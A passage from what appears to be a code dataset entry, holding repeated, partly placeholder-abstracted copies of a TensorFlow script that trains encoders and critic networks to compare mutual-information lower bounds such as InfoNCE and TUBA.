shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\n<function token>\n<function token>\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = 